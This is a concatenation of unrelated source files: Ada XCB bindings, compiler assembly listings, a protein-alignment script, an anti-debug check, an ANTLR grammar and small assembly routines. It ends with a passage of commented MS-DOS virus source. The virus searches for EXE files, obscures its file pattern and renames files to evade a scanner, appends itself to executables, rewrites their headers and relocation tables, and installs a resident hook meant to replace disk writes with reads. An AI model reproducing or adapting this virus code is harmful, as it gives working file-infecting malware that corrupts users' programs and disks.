free(). -- function xcb_set_modifier_mapping_reply (c : access xcb.xcb_connection_t; cookie : xcb_set_modifier_mapping_cookie_t; e : System.Address) return access xcb_set_modifier_mapping_reply_t -- /usr/include/xcb/xproto.h:12602 with Import => True, Convention => C, External_Name => "xcb_set_modifier_mapping_reply"; --*< function xcb_get_modifier_mapping_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:12607 with Import => True, Convention => C, External_Name => "xcb_get_modifier_mapping_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_get_modifier_mapping (c : access xcb.xcb_connection_t) return xcb_get_modifier_mapping_cookie_t -- /usr/include/xcb/xproto.h:12618 with Import => True, Convention => C, External_Name => "xcb_get_modifier_mapping"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_get_modifier_mapping_unchecked (c : access xcb.xcb_connection_t) return xcb_get_modifier_mapping_cookie_t -- /usr/include/xcb/xproto.h:12632 with Import => True, Convention => C, External_Name => "xcb_get_modifier_mapping_unchecked"; function xcb_get_modifier_mapping_keycodes (R : access constant xcb_get_modifier_mapping_reply_t) return access xcb_keycode_t -- /usr/include/xcb/xproto.h:12635 with Import => True, Convention => C, External_Name => "xcb_get_modifier_mapping_keycodes"; function xcb_get_modifier_mapping_keycodes_length (R : access constant xcb_get_modifier_mapping_reply_t) return int -- /usr/include/xcb/xproto.h:12638 with Import => True, Convention => C, External_Name => "xcb_get_modifier_mapping_keycodes_length"; function xcb_get_modifier_mapping_keycodes_end (R : access constant xcb_get_modifier_mapping_reply_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:12641 with Import => True, Convention => C, External_Name => "xcb_get_modifier_mapping_keycodes_end"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_get_modifier_mapping_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_get_modifier_mapping_reply (c : access xcb.xcb_connection_t; cookie : xcb_get_modifier_mapping_cookie_t; e : System.Address) return access xcb_get_modifier_mapping_reply_t -- /usr/include/xcb/xproto.h:12658 with Import => True, Convention => C, External_Name => "xcb_get_modifier_mapping_reply"; --*< --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_no_operation_checked (c : access xcb.xcb_connection_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12674 with Import => True, Convention => C, External_Name => "xcb_no_operation_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_no_operation (c : access xcb.xcb_connection_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:12685 with Import => True, Convention => C, External_Name => "xcb_no_operation"; --* -- * @} -- end xproto;
配套代码/L059/REV_059/2.asm
zmrbak/ReverseAnalysis
35
100263
<gh_stars>10-100 ; Listing generated by Microsoft (R) Optimizing Compiler Version 19.26.28720.3 include listing.inc INCLUDELIB LIBCMT INCLUDELIB OLDNAMES CONST SEGMENT $SG30706 DB 'Hello World!', 0aH, 00H ORG $+2 $SG30707 DB '%lld', 0aH, 00H ORG $+2 $SG30708 DB '%I64d', 0aH, 00H ORG $+1 $SG30709 DB 'Hello World 1!', 0aH, 00H $SG30710 DB '%lld', 0aH, 00H CONST ENDS PUBLIC __local_stdio_printf_options PUBLIC _vfprintf_l PUBLIC printf PUBLIC ?f@@YA_KXZ ; f PUBLIC ?f_add@@YA_K_K0@Z ; f_add PUBLIC ?f_sub@@YA_K_K0@Z ; f_sub PUBLIC ?f_multi@@YA_K_K0@Z ; f_multi PUBLIC ?f_div@@YA_K_K0@Z ; f_div PUBLIC ?f_left@@YA_K_K0@Z ; f_left PUBLIC ?f_right@@YA_K_K0@Z ; f_right PUBLIC main PUBLIC ?_OptionsStorage@?1??__local_stdio_printf_options@@9@4_KA ; `__local_stdio_printf_options'::`2'::_OptionsStorage EXTRN __acrt_iob_func:PROC EXTRN __stdio_common_vfprintf:PROC ; COMDAT ?_OptionsStorage@?1??__local_stdio_printf_options@@9@4_KA _BSS SEGMENT ?_OptionsStorage@?1??__local_stdio_printf_options@@9@4_KA DQ 01H DUP (?) ; `__local_stdio_printf_options'::`2'::_OptionsStorage _BSS ENDS ; COMDAT pdata pdata SEGMENT $pdata$_vfprintf_l DD imagerel $LN3 DD imagerel $LN3+67 DD imagerel $unwind$_vfprintf_l pdata ENDS ; COMDAT pdata pdata SEGMENT $pdata$printf DD imagerel $LN3 DD imagerel $LN3+87 DD imagerel $unwind$printf pdata ENDS pdata SEGMENT $pdata$main DD imagerel $LN3 DD imagerel $LN3+126 DD imagerel $unwind$main pdata ENDS xdata SEGMENT $unwind$main DD 010401H DD 06204H xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$printf DD 011801H DD 06218H xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$_vfprintf_l DD 011801H DD 06218H xdata ENDS ; Function compile flags: /Odtp _TEXT SEGMENT a$ = 32 main PROC ; File C:\Users\libit\source\repos\REV_059\REV_059\REV_059.cpp ; Line 41 $LN3: sub rsp, 56 ; 00000038H ; Line 42 lea rcx, OFFSET FLAT:$SG30706 call printf ; Line 44 call ?f@@YA_KXZ ; f mov QWORD PTR a$[rsp], rax ; Line 45 mov rdx, QWORD PTR a$[rsp] lea rcx, OFFSET FLAT:$SG30707 call printf ; Line 46 mov rdx, QWORD PTR a$[rsp] lea rcx, OFFSET FLAT:$SG30708 call printf ; Line 48 lea rcx, OFFSET FLAT:$SG30709 call printf ; Line 49 mov rdx, 2459565879930580718 ; 22222222eeeeeeeeH mov rcx, 1229782942255939583 ; 11111111ffffffffH call ?f_add@@YA_K_K0@Z ; f_add mov QWORD PTR a$[rsp], rax ; Line 50 mov rdx, QWORD PTR a$[rsp] lea rcx, OFFSET FLAT:$SG30710 call printf ; Line 51 xor eax, eax add rsp, 56 ; 00000038H ret 0 main ENDP _TEXT ENDS ; Function compile flags: /Odtp _TEXT SEGMENT a$ = 8 b$ = 16 ?f_right@@YA_K_K0@Z PROC ; f_right ; File C:\Users\libit\source\repos\REV_059\REV_059\REV_059.cpp ; Line 36 mov QWORD PTR [rsp+16], rdx mov QWORD PTR [rsp+8], rcx ; Line 37 mov rax, QWORD PTR b$[rsp] movzx ecx, al mov rax, QWORD PTR a$[rsp] shr rax, cl ; Line 38 ret 0 ?f_right@@YA_K_K0@Z ENDP ; f_right _TEXT ENDS ; Function compile flags: /Odtp _TEXT SEGMENT a$ = 8 b$ = 16 ?f_left@@YA_K_K0@Z PROC ; f_left ; File C:\Users\libit\source\repos\REV_059\REV_059\REV_059.cpp ; Line 31 mov QWORD PTR [rsp+16], rdx mov QWORD PTR [rsp+8], rcx ; Line 32 mov rax, QWORD PTR b$[rsp] movzx ecx, al mov rax, QWORD PTR a$[rsp] shl rax, cl ; Line 33 ret 0 ?f_left@@YA_K_K0@Z ENDP ; f_left _TEXT ENDS ; Function compile flags: /Odtp _TEXT SEGMENT a$ = 8 b$ = 16 ?f_div@@YA_K_K0@Z PROC ; f_div ; File C:\Users\libit\source\repos\REV_059\REV_059\REV_059.cpp ; Line 26 mov QWORD PTR [rsp+16], rdx mov QWORD PTR [rsp+8], rcx ; Line 27 xor edx, edx mov rax, QWORD PTR a$[rsp] div QWORD PTR b$[rsp] ; Line 28 ret 0 ?f_div@@YA_K_K0@Z ENDP ; f_div _TEXT ENDS ; Function compile flags: /Odtp _TEXT SEGMENT a$ = 8 b$ = 16 ?f_multi@@YA_K_K0@Z PROC ; f_multi ; File C:\Users\libit\source\repos\REV_059\REV_059\REV_059.cpp ; Line 21 mov QWORD PTR [rsp+16], rdx mov QWORD PTR [rsp+8], rcx ; Line 22 mov rax, QWORD PTR a$[rsp] imul rax, QWORD PTR b$[rsp] ; Line 23 ret 0 ?f_multi@@YA_K_K0@Z ENDP ; f_multi _TEXT ENDS ; Function compile flags: /Odtp _TEXT SEGMENT a$ = 8 b$ = 16 ?f_sub@@YA_K_K0@Z PROC ; f_sub ; File C:\Users\libit\source\repos\REV_059\REV_059\REV_059.cpp ; Line 16 mov QWORD PTR [rsp+16], rdx mov QWORD PTR [rsp+8], rcx ; Line 17 mov rax, QWORD PTR b$[rsp] mov rcx, QWORD PTR a$[rsp] sub rcx, rax mov rax, rcx ; Line 18 ret 0 ?f_sub@@YA_K_K0@Z ENDP ; f_sub _TEXT ENDS ; Function compile flags: /Odtp _TEXT SEGMENT a$ = 8 b$ = 16 ?f_add@@YA_K_K0@Z PROC ; f_add ; File C:\Users\libit\source\repos\REV_059\REV_059\REV_059.cpp ; Line 11 mov QWORD PTR [rsp+16], rdx mov QWORD PTR [rsp+8], rcx ; Line 12 mov rax, QWORD PTR b$[rsp] mov rcx, QWORD PTR a$[rsp] add rcx, rax mov rax, rcx ; Line 13 ret 0 ?f_add@@YA_K_K0@Z ENDP ; f_add _TEXT ENDS ; Function compile flags: /Odtp _TEXT SEGMENT ?f@@YA_KXZ PROC ; f ; File C:\Users\libit\source\repos\REV_059\REV_059\REV_059.cpp ; Line 7 mov rax, 1311768467294899695 ; 1234567890abcdefH ; Line 8 ret 0 ?f@@YA_KXZ ENDP ; f _TEXT ENDS ; Function compile flags: /Odtp ; COMDAT printf _TEXT SEGMENT _Result$ = 32 _ArgList$ = 40 _Format$ = 64 printf PROC ; COMDAT ; File C:\Program Files (x86)\Windows Kits\10\include\10.0.17763.0\ucrt\stdio.h ; Line 954 $LN3: mov QWORD PTR [rsp+8], rcx mov QWORD PTR [rsp+16], rdx mov QWORD PTR [rsp+24], r8 mov QWORD PTR [rsp+32], r9 sub rsp, 56 ; 00000038H ; Line 957 lea rax, QWORD PTR _Format$[rsp+8] mov QWORD PTR _ArgList$[rsp], rax ; Line 958 mov ecx, 1 call __acrt_iob_func mov r9, QWORD PTR _ArgList$[rsp] xor r8d, r8d mov rdx, QWORD PTR _Format$[rsp] mov rcx, rax call _vfprintf_l mov DWORD PTR _Result$[rsp], eax ; Line 959 mov QWORD PTR _ArgList$[rsp], 0 ; Line 960 mov eax, DWORD PTR _Result$[rsp] ; Line 961 add rsp, 56 ; 00000038H ret 0 printf ENDP _TEXT ENDS ; Function compile flags: /Odtp ; COMDAT _vfprintf_l _TEXT SEGMENT _Stream$ = 64 _Format$ = 72 _Locale$ = 80 _ArgList$ = 88 _vfprintf_l PROC ; COMDAT ; File C:\Program Files (x86)\Windows Kits\10\include\10.0.17763.0\ucrt\stdio.h ; Line 642 $LN3: mov QWORD PTR [rsp+32], r9 mov QWORD PTR [rsp+24], r8 mov QWORD PTR [rsp+16], rdx mov QWORD PTR [rsp+8], rcx sub rsp, 56 ; 00000038H ; Line 643 call __local_stdio_printf_options mov rcx, QWORD PTR _ArgList$[rsp] mov QWORD PTR [rsp+32], rcx mov r9, QWORD PTR _Locale$[rsp] mov r8, QWORD PTR _Format$[rsp] mov rdx, QWORD PTR _Stream$[rsp] mov rcx, QWORD PTR [rax] call __stdio_common_vfprintf ; Line 644 add rsp, 56 ; 00000038H ret 0 _vfprintf_l ENDP _TEXT ENDS ; Function compile flags: /Odtp ; COMDAT __local_stdio_printf_options _TEXT SEGMENT __local_stdio_printf_options PROC ; COMDAT ; File C:\Program Files (x86)\Windows Kits\10\include\10.0.17763.0\ucrt\corecrt_stdio_config.h ; Line 88 lea rax, OFFSET FLAT:?_OptionsStorage@?1??__local_stdio_printf_options@@9@4_KA ; `__local_stdio_printf_options'::`2'::_OptionsStorage ; Line 89 ret 0 __local_stdio_printf_options ENDP _TEXT ENDS END
data/jpred4/jp_batch_1613899824__oM2uQFj/jp_batch_1613899824__oM2uQFj.als
jonriege/predict-protein-structure
0
1124
SILENT_MODE BLOCK_FILE jp_batch_1613899824__oM2uQFj.concise.blc MAX_NSEQ 832 MAX_INPUT_LEN 834 OUTPUT_FILE jp_batch_1613899824__oM2uQFj.concise.ps PORTRAIT POINTSIZE 8 IDENT_WIDTH 12 X_OFFSET 2 Y_OFFSET 2 DEFINE_FONT 0 Helvetica DEFAULT DEFINE_FONT 1 Helvetica REL 0.75 DEFINE_FONT 7 Helvetica REL 0.6 DEFINE_FONT 3 Helvetica-Bold DEFAULT DEFINE_FONT 4 Times-Bold DEFAULT DEFINE_FONT 5 Helvetica-BoldOblique DEFAULT # DEFINE_COLOUR 3 1 0.62 0.67 # Turquiose DEFINE_COLOUR 4 1 1 0 # Yellow DEFINE_COLOUR 5 1 0 0 # Red DEFINE_COLOUR 7 1 0 1 # Purple DEFINE_COLOUR 8 0 0 1 # Blue DEFINE_COLOUR 9 0 1 0 # Green DEFINE_COLOUR 10 0.41 0.64 1.00 # Pale blue DEFINE_COLOUR 11 0.41 0.82 0.67 # Pale green DEFINE_COLOUR 50 0.69 0.18 0.37 # Pink (helix) DEFINE_COLOUR 51 1.00 0.89 0.00 # Gold (strand) NUMBER_INT 10 SETUP # # Highlight specific residues. # Avoid highlighting Lupas 'C' predictions by # limiting the highlighting to the alignments Scol_CHARS C 1 1 123 821 4 Ccol_CHARS H ALL 5 Ccol_CHARS P ALL 8 SURROUND_CHARS LIV ALL # # Replace known structure types with whitespace SUB_CHARS 1 822 123 831 H SPACE SUB_CHARS 1 822 123 831 E SPACE SUB_CHARS 1 822 123 831 - SPACE STRAND 9 825 12 COLOUR_TEXT_REGION 9 825 12 825 51 STRAND 69 825 78 COLOUR_TEXT_REGION 69 825 78 825 51 STRAND 81 825 85 COLOUR_TEXT_REGION 81 825 85 825 51 HELIX 4 825 8 COLOUR_TEXT_REGION 4 825 8 825 50 HELIX 40 825 57 COLOUR_TEXT_REGION 40 825 57 825 50 HELIX 91 825 107 COLOUR_TEXT_REGION 91 825 107 825 50 STRAND 10 830 12 COLOUR_TEXT_REGION 10 830 12 830 51 STRAND 69 830 77 COLOUR_TEXT_REGION 69 830 77 830 51 STRAND 82 830 84 COLOUR_TEXT_REGION 82 830 84 830 51 HELIX 3 830 9 COLOUR_TEXT_REGION 3 830 9 830 50 HELIX 38 830 57 COLOUR_TEXT_REGION 38 830 57 830 50 HELIX 91 830 107 COLOUR_TEXT_REGION 91 830 107 830 50 STRAND 9 831 13 COLOUR_TEXT_REGION 9 831 13 831 51 STRAND 70 831 78 COLOUR_TEXT_REGION 70 831 78 831 51 STRAND 81 831 86 COLOUR_TEXT_REGION 81 831 86 831 51 HELIX 48 831 57 COLOUR_TEXT_REGION 48 831 57 831 50 HELIX 91 831 106 COLOUR_TEXT_REGION 91 831 106 831 50
Client/AssemblyMacro.asm
bank2014/AntiTemper
0
3513
<filename>Client/AssemblyMacro.asm .CODE TrapflagCheck PROC pushfq or dword ptr[rsp],10100h popfq db 0fh ;cpuid db 0a2h nop nop nop ret TrapflagCheck ENDP LazyCheckHyperv PROC xor ecx,ecx mov eax,1 cpuid test ecx, 80000000h jne detect xor eax,eax ret detect: mov al,1 ret LazyCheckHyperv ENDP END
source/coroutines.ads
reznikmm/coroutines
3
20920
-- Copyright (c) 2019 <NAME> <<EMAIL>> -- -- SPDX-License-Identifier: MIT -- License-Filename: LICENSE ------------------------------------------------------------- -- -- Coroutine is a basic components for non-preemptive multitasking. -- with System.Storage_Elements; private with Ada.Containers.Vectors; package Coroutines is pragma Preelaborate; procedure Initialize; -- Call this before use type Runable_Code is not null access procedure; -- A procedure to be executed as coroutine procedure Start (Runable : Runable_Code; Stack_Size : System.Storage_Elements.Storage_Count); -- Launch a new coroutine. -- Runable is an actual code to be executed under the coroutine; -- it should not execute any blocking call (except Yield). -- Stack_Size is size of stack dedicated to execute the coroutine. generic type Argument_Type is private; procedure Generic_Start (Runable : not null access procedure (Argument : Argument_Type); Stack_Size : System.Storage_Elements.Storage_Count; Argument : Argument_Type); -- Generic version of Start procedure. Runable should be library-level -- procedure. procedure Yield; -- Runable procedure can call Yield to suspend execution. The coroutine -- stay ready for execution. type Event_Id is private; type Event_Id_Array is array (Positive range <>) of Event_Id; procedure Yield (Wait : Event_Id); -- Runable procadure can call Yield to suspend execution until Wait event -- happens. procedure Yield (Wait : Event_Id_Array := (1 .. 0 => <>); Result : access Natural := null); -- Runable procadure can call Yield to suspend execution until one of event -- on Wait happens. On resume Result is an index of the event_id. If Wait -- is empty, then this Yield never returns. private type Event_Object is limited interface; type Event_Id is access all Event_Object'Class; not overriding procedure Activate (Self : in out Event_Object) is abstract; not overriding function Ready (Self : Event_Object) return Boolean is abstract; not overriding procedure Deactivate (Self : in out Event_Object) is abstract; type Context is new System.Address; function Null_Context return Context is (Context (System.Null_Address)); package Context_Vectors is new Ada.Containers.Vectors (Index_Type => Positive, Element_Type => Context); type Coroutine_Manager is limited interface; type Coroutine_Manager_Access is access all Coroutine_Manager'Class; not overriding procedure Get_Always_Ready_Event (Self : in out Coroutine_Manager; Result : out Event_Id) is abstract; not overriding procedure New_Round (Self : in out Coroutine_Manager; Queue : in out Context_Vectors.Vector; Timeout : Duration) is null; Manager : Coroutine_Manager_Access; function Hash (Self : Context) return Ada.Containers.Hash_Type; function Current_Context return Context; end Coroutines;
src/main/java/com/antlr/math/math.g4
prs1022/antlr_query
1
6402
grammar math; import CommonLexer; NUMBER:DIGIT+; WS : [ \r\n\t]+ -> channel(HIDDEN) ; ADD : '+' ; SUB : '-' ; MUL : '*' ; DIV : '/' ; L:'('; R:')'; root:exp EOF #n1 ; exp:factor (op1 factor)* #n2 ; factor:term (op2 term)* #n3 ; term: n #n4 |L exp R #n5 ; op1:ADD #n6 |SUB #n7 ; op2:MUL #n8 |DIV #n9 ; n:NUMBER #n10 ;
libsrc/_DEVELOPMENT/math/float/math48/lm/c/sccz80/copysign_callee.asm
jpoikela/z88dk
640
6347
<reponame>jpoikela/z88dk<gh_stars>100-1000 SECTION code_clib SECTION code_fp_math48 PUBLIC copysign_callee EXTERN cm48_sccz80_copysign_callee defc copysign_callee = cm48_sccz80_copysign_callee
programs/oeis/022/A022347.asm
karttu/loda
0
9152
; A022347: Fibonacci sequence beginning 0, 13. ; 0,13,13,26,39,65,104,169,273,442,715,1157,1872,3029,4901,7930,12831,20761,33592,54353,87945,142298,230243,372541,602784,975325,1578109,2553434,4131543,6684977,10816520,17501497,28318017,45819514,74137531,119957045,194094576,314051621,508146197,822197818,1330344015,2152541833,3482885848,5635427681,9118313529,14753741210,23872054739,38625795949,62497850688,101123646637,163621497325,264745143962,428366641287,693111785249,1121478426536,1814590211785,2936068638321,4750658850106,7686727488427,12437386338533,20124113826960,32561500165493,52685613992453,85247114157946,137932728150399,223179842308345,361112570458744,584292412767089,945404983225833,1529697395992922,2475102379218755,4004799775211677,6479902154430432 mov $3,1 lpb $0,1 sub $0,1 mov $2,$1 mov $1,$3 add $3,$2 lpe mul $1,13
MSDOS/Virus.MSDOS.Unknown.vcomm.asm
fengjixuchui/Family
3
15817
<gh_stars>1-10 ;--------------------------------------------------------------------; ; ; ; EXE virus, with resident part ; ; ; ; ---- infecting program ---- ; ; ; ;--------------------------------------------------------------------; ;--------------------------------------------------------------------; ; ; ; WARNING : it's definitely NOT safe to assemble and execute ; ; this code. If anybody has to, I highly reccomend using ; ; a diskette and debugger. ; ; ; ;--------------------------------------------------------------------; ;********************************************************************* ;--------------------------------------------------------------------; ; ; ; The EXE virus concept is as follows: ; ; ; ; First, original Disk Transfer Address is preserved to avoid ; ; changing command-line text. Also initial values of CS, IP, SS, SP ; ; DS and ES are saved (to be restored on exit from virus code). ; ; Virus is to be appended to original code and, of course, has ; ; to be relocated before it's executed. Thus, first we look for ; ; an EXE file. Then we have to know if this is in fact an EXE ; ; (checking for magic 'MZ' signature) and if there is any free space ; ; in relocation table. This is checked by substracting relocation ; ; table end (i.e. sum of table start and number of relocation items, ; ; multiplied by table entry size) from EXE header size. ; ; Smart virus shouldn't infect a file that's already infected. ; ; So first 4 bytes of code to be executed is compared against ; ; virus code. If they match one another, no infection takes place. ; ; Having found suitable file, we compute its code end and append ; ; virus at the end of code, writing alignment to last 512-bytes page ; ; boundary if necessary. Original start address is preserved inside ; ; virus, and CS:IP value in EXE header gets changed, so that virus ; ; code would be executed first. Number of pages gets changed, ; ; together with Last Page Size and Number Of Relocation Items. ; ; New relocation item address is appended to relocation table, ; ; pointing to the segment of the far jump in virus (this is the jump ; ; virus uses to return to original code). ; ; Upon returning from virus, all saved registers and DTA are ; ; restored to reestablish environment state as if no virus existed. ; ; ; ; Virus also installs resident part, if it is not already present. ; ; This part's job is to replace all disk 'writes' with corresponding ; ; 'reads'. It's rather unharmful, but can easily be replaced with ; ; more dangerous one (if somebody is really keen to be called ...). ; ; Instalation can be removed with equal ease, as well. ; ; ; ; The real trouble with EXEs is that DOS pays a little (if any) ; ; attention to Last Page Size. Therefore EXE files ofen have this ; ; zeroed, even if they have some code on the last page. Writing to ; ; last page can cause system crash while infected file is being ; ; executed. To solve the problem, one should first test if EXE file ; ; really ends as the header contents say and move to last page end ; ; instead of appending any bytes, if possible. ; ; ; ; Another problem is infecting EXEs containg debug info. ; ; It comes in various formats, and often contains vital informations ; ; placed behind code. This info gets destroyed when file becomes ; ; infected. I see no solution to this problem, so far. ; ; ; ;--------------------------------------------------------------------; ;********************************************************************; ;--------------------------------------------------------------------; ; ; ; SEGMENT dummy ; ; ; ; Raison d'etre of this segment is to force assembling of ; ; the JMP FAR after the execution of virus code. ; ; ; ; This segment serves also to make it possible for the infecting ; ; program to return to DOS. ; ; ; ;--------------------------------------------------------------------; dummy segment 'dummy' assume cs: dummy d_end label far ; this is the point virus jumps to ; after executing itself mov ah, 4Ch int 21h ; DOS EXIT function dummy ends ;--------------------------------------------------------------------; ; ; ; SEGMENT code ; ; ; ; Code for virus (including its resident part). ; ; ; ; Executed from label start:. Exits via dummy:d_end. ; ; ; ;--------------------------------------------------------------------; code segment 'code' public start, jump, old_IP, old_CS, old_DTA, public next, ok, exit, header, DTA, file_name, old_SS, old_SP, aux public last_page, page_count, item_count, header_size, table_start public header_IP, header_CS, header_SS, header_SP, aux_CS, aux_IP public not_ok, time, date, attributes, new_name, found_name public restore_and_close, dot, seek_dot, next_letter, install_flag public next_lttr, EXE_sign, int_CS, int_IP, virus_length, set_ES public resident, resident_size, l1, call_int, install, set_DS assume cs : code, ds : code ;--------------------------------------------------------------------; ; ; ; Here are symbolic names for memory locations ; ; ; ;--------------------------------------------------------------------; ; First go names for EXE header contents EXE_sign equ word ptr [header] last_page equ word ptr [header + 2] page_count equ word ptr [header + 4] item_count equ word ptr [header + 6] header_size equ word ptr [header + 8] header_SS equ word ptr [header + 0Eh] header_SP equ word ptr [header + 10h] header_IP equ word ptr [header + 14h] header_CS equ word ptr [header + 16h] table_start equ word ptr [header + 18h] ; Now names for address of mother program old_IP equ word ptr [jump + 1] old_CS equ word ptr [jump + 3] ; Segment to put resident part in, for instance end of 2nd Hercules page resident_CS equ 0BFFEh ; And label for the name of the file found by Find_First and Find_Next found_name equ DTA + 1Eh ; Last is virus length virus_length equ offset header ;------------ Now starts virus code --------------------------------; ; First original values of SS, SP, ES, DS are preserved, ; and new values for this registers are set start: mov cx, ss ; temporarily save SS in CX mov dx, sp ; and SP in DX mov ax, cs ; now AX = CODE cli ; disable hard ints while changing stack mov ss, ax ; now SS = CODE mov sp, 0FFFFh ; and SS points to segment end sti ; hardware interrupts are OK now push ds ; preserve DS on stack push es ; same with ES push cs pop ds ; set DS to CODE mov [old_SS], cx ; now as DS is CODE, we can store mov [old_SP], dx ; original SS and SP in memory ; Original DTA is preserved now mov ah, 2Fh int 21h mov word ptr [old_DTA], bx ; now ES:BX points to DTA mov word ptr [old_DTA + 2], es ; save its address in memory ; Call to Get_DTA would have destroyed ES. Now set it push ds ; set ES to CODE pop es ; And now new DTA is established for virus disk actions mov dx, offset DTA ; DS:DX point to new DTA mov ah, 1Ah int 21h ; Store original INT_13 vector for use in resident part mov ax, 3513h int 21h ; DOS Get_Interrupt_Vector function mov [int_IP], bx ; now ES:BX holds INT_13 vector mov [int_CS], es ; store it inside resident part ; Check if resident part already present mov ax, es ; compare can work with AX cmp ax, resident_CS ; check if this is resident_CS jnz install ; no, so install cmp bx, 0 ; is offset 0 ? jnz install ; no, so install ; Resident part found, do not install mov [install_flag], 0 ; signal 'no installing' jmp short set_ES ; and omit copying code ; Now resident part is moved to its place in memory install: mov ax, resident_CS mov es, ax ; ES = segment for resident part xor di, di ; DI = 0, resident starts from offset 0 mov si, offset resident ; SI = offset in DS for resident part mov cx, resident_size ; CX = size of resident part cld ; set auto increment rep movsb ; copy resident part from DS:SI to ES:DI mov [install_flag], 1 ; signal 'instal vector' ; Reestablish destroyed ES to CODE set_ES: push ds pop es ; Now decode "*.EXE" name pattern. It's coded to disable 'eye-shot' discovery mov si, offset file_name ; name pattern starts there mov cx, 5 ; and is 5 bytes long next_letter: inc byte ptr [si] ; decode by incrementing by one inc si loop next_letter ; decode all 5 bytes ; Find an EXE file mov dx, offset file_name ; DS:DX points to '*.EXE' mov cx, 20h ; search for read-only files too mov ah, 4Eh ; DOS Find_First function int 21h ; now DTA gets filled with info jnc check ; no carry means file found ; jump to check if to infect file jmp exit ; no EXE file - nothing to do ; Find next EXE file, if necessary next: mov ah, 4Fh ;DOS Find_Next function int 21h jnc check ; see jumps after Find_First jmp exit ; for explanation ; Check if file should and can be infected ; First of all, get file attributes check: mov dx, offset found_name ; DS:DX points to found file name mov ax, 4300h ; DOS Get_File_Attributes function int 21h ; attributes returned in CX mov [attributes], cx ; preserve them in memory ; Then change file attributes to 'neutral' mov dx, offset found_name ; DS:DX points to found file name xor cx, cx ; CX = 0 - means no attributes set mov ax, 4301h ; DOS Set_File_Attributes function int 21h ; attributes to be set in CX ; To avoid being spotted by VIRBLK, rename ????????.EXE to ???????. mov si, offset found_name ; DS:DX points to found file name mov di, offset new_name ; ES:DI points to new name cld ; set auto increment ; Copy old name to new name until dot found seek_dot: lodsb ; get character at DS:SI cmp al, '.' ; check if it is a dot stosb ; copy it anyway to ES:DI jz dot ; dot found, end of copying loop seek_dot ; if no dot, copy next character ; DOS requires ASCIIZ strings, so append a byte of 0 to new name dot: xor al, al ; AL = 0 stosb ; store 0 to byte at ES:DI ; Now rename can be performed mov dx, offset found_name ; DS:DX points to old name mov di, offset new_name ; ES:DI points to new name mov ah, 56h ; DOS Rename_File function int 21h ; It is safe to open file now mov dx, offset new_name ; DS:DX points to file name mov ax, 3D02h ; DOS Open_File_Handle fuction int 21h ; open file for reading and writing jc next ; carry set means for some reason ; operation failed ; try to find next file ; Preserve handle for just open file in BX register mov bx, ax ; all DOS calls require handle in BX ; Now store original file time and date, to be restored on closing the file mov ax, 5700h ; DOS Get_File_Time_Date function int 21h ; time returned in CX, date in DX mov [time], cx ; store time in memory mov [date], dx ; same with date ; Read EXE header to memory mov dx, offset header ; DS:DX = place to read header to mov cx, 1Ah ; header is 1Ah bytes long mov ah, 3Fh ; DOS Read_Handle function int 21h ; Check if it is a real EXE, not just EXE-named file check_EXE: cmp EXE_sign, 5A4Dh ; first two bytes of header should ; contain 'MZ' characters jne not_ok ; if not, don't proceed with file ; It is EXE, check if it is already infected ; by comparing code start with itself ; Compute where code in file starts mov ax, [header_CS] ; get start CS for file add ax, [header_size] ; add header size mov cx, 16 ; above were in 16 bytes units mul cx ; so multiply by 16 ; DX|AX holds result add ax, [header_IP] ; add for IP adc dx, 0 ; propagate carry if necessasry ; Now DX|AX holds file offset for code start, move there mov cx, dx ; set registers for DOS call mov dx, ax mov ax, 4200h ; DOS Move_File_Ptr function int 21h ; move relatively to start ; Read first four bytes of code mov dx, offset aux ; DS:DX = place to read code into mov cx, 4 ; CX = number of bytes to read mov ah, 3Fh ; DOS Read_Handle function int 21h ; Compare them with itself mov di, offset aux ; ES:DI points to code from file mov si, offset start ; DS:SI points to itself start mov cx, 2 ; CX = number of words to compare cld ; set auto increment repe cmpsw ; compare while equal je not_ok ; equal = infected, don't proceed ; Check if there is space in relocation table to put one more item ; Calculate where Relocation_Table ends mov ax, [item_count] ; get number of Relocation Items inc ax ; add for new one mov cx, 4 ; each one is 4 bytes long mul cx ; so multiply by 4 ; DX|AX holds result add ax, [table_start] ; add offset of Relocation_Table adc dx, 0 ; process carry ; Now DX|AX holds file offset for table end, store it temporarily in DI|SI mov di, dx ; preserve Relocation_Table offset mov si, ax ; Calculate where code starts (in file) mov ax, [header_size] ; get header size for this EXE mov cx, 10h ; as it is in 16 byte units, mul cx ; multiply by 16 ; DX|AX holds result ; See if there is free space for relocation item sub ax, si ; substract Relocation_Table end sbb dx, di jae ok ; Relocation_Table end not less ; then code start, so there IS room ; If somehow this file is not to be infected, restore it's original state not_ok: call restore_and_close jmp next ; nevertheless, try to find infectable one ; File is to be infected now ; First adjust file offset for new relocation item ok: sub si, 4 ; new item starts 4 bytes sbb di, 0 ; before Relocation_Table end ; Then preserve temporarily address of the mother code mov ax, [old_CS] ; preserve jump address via AX mov [aux_CS], ax ; in memory mov ax, [old_IP] mov [aux_IP], ax ; Form inside itself a jump to new mother start mov ax, [header_IP] ; store new mother CS:IP as jump mov [old_IP], ax ; do it via AX mov ax, [header_CS] mov [old_CS], ax ; Calculate last page alignment mov cx, [last_page] ; CX = number of bytes in last page mov ax, 200h ; AX = page size (page is 512 bytes) sub ax, cx ; CX = alignment to page boundary mov bp, ax ; preserve alignment in BP ; Calculate new CS:IP values to execute virus instead of mother mov ax, [page_count] ; get number of pages in new mother mov cx, 20h ; multiply by 32 to convert to mul cx ; 16 